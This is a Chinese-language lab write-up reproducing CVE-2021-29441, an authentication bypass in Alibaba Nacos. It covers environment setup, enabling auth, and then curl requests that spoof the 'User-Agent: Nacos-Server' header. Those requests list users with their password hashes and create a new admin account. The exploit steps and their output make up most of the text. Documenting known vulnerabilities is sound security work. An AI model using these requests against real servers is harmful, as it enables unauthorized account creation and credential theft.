Preface
https://github.com/alibaba/nacos/issues/4701
https://nvd.nist.gov/vuln/detail/CVE-2021-29441
Alibaba Nacos權限認證繞過漏洞復現
https://www.freebuf.com/vuls/263845.html
環境搭建
wget https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1 tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz cd nacos/bin ./startup.sh -m standalone
訪問 http://ip:8848/nacos/#/login,使用默認賬號密碼:nacos/nacos
http://10.63.0.14:8848/nacos/#/login
復現記錄
Step1 : 查看當前用戶列表
http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=100
Step2:啟用認證
修改配置文件 conf/application.properties,啟用nacos.core.auth.enabled
ps -ef | grep nacos kill -9 nacos-pid cat conf/application.properties | grep nacos.core.auth.enabled nacos.core.auth.enabled=true 再次啟動 ./bin/startup.sh -m standalone
訪問接口:
curl -X GET 'http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' {"timestamp":"2022-03-07T19:05:12.209+08:00","status":403,"error":"Forbidden","message":"unknown user!","path":"/nacos/v1/auth/users"}%
Step 3:繞過
curl -X GET 'http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' -H 'User-Agent: Nacos-Server' | python -m json.tool { "pageItems": [ { "password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu", "username": "nacos" } ], "pageNumber": 1, "pagesAvailable": 1, "totalCount": 1 }
Step 4: 創建用戶
curl -X POST 'http://10.63.0.14:8848/nacos/v1/auth/users?username=admin&password=admin' -H 'User-Agent: Nacos-Server' | python -m json.tool { "code": 200, "data": null, "message": "create user ok!" } curl -X GET 'http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' -H 'User-Agent: Nacos-Server' | python -m json.tool { "pageItems": [ { "password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu", "username": "nacos" }, { "password": "$2a$10$FW35Bu3vApps1EmIm105eOuAEP2UBAxXbXtEwIpdxkEMmn/Qvr7de", "username": "admin" } ], "pageNumber": 1, "pagesAvailable": 1, "totalCount": 2 }
# 用戶管理 :http://10.63.0.14:8848/nacos/#/userManagement
也可以看到我們創建的用戶
以上!